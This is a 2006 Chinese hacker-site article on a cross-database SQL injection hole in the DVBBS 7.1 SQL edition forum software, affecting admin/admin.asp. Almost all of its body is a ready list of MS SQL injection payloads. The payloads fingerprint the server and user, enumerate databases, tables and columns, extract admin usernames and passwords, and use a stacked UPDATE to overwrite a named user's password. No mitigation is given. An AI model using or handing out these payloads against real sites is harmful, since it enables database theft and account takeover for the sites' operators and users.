| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | 

您现在的位置: 中国X黑客小组 >> 技术文章 >> 安全防御 >> 漏洞分析 >> 文章正文 用户登录 新用户注册
  DVBBS7.1 SQL版 跨库漏洞         ★★★ 【字体:
DVBBS7.1 SQL版 跨库漏洞
作者:未知    文章来源:CnXHacker.Net    点击数:    更新时间:2006-3-22    

漏洞测试环境:DVBBS7.1 SQL

受影响文件
admin/admin.asp
.....

漏洞利用

(select @@version)>0 获得Windows的版本号
and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER(’db_owner’)) --查询数据库当前用户权限

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype=’U’) --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype=’U’ and name not in (’web_Admin’)) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype=’U’ and name=’web_Admin’ and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in(’adminname’)) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username=’bluefire’) -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd=’965eb72c92a549dd’ where username=’mthfc’;-- 

文章录入:IceRiver    责任编辑:IceRiver 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    最新热点 最新推荐 相关文章
    “VB蠕虫变种MQ”病毒技术细
    SIDVault Simple_Bind 函数多
    SIDVault Simple_Bind 函数多
    VB.NET 拖动无边框窗体编程实
    病毒清除技巧u.vbe和u.bat手
    了解VB编写病毒的大体方法
    Advanced SQL Injection In 
    用vbs来写sql注入等80端口的
    推荐:BBSXP最新漏洞简单分析
    Delphi的TWebBrowser编程综述
      网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    Powered by ICE RIVER - STUDIO
    » CnXHacker.CoM   © CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.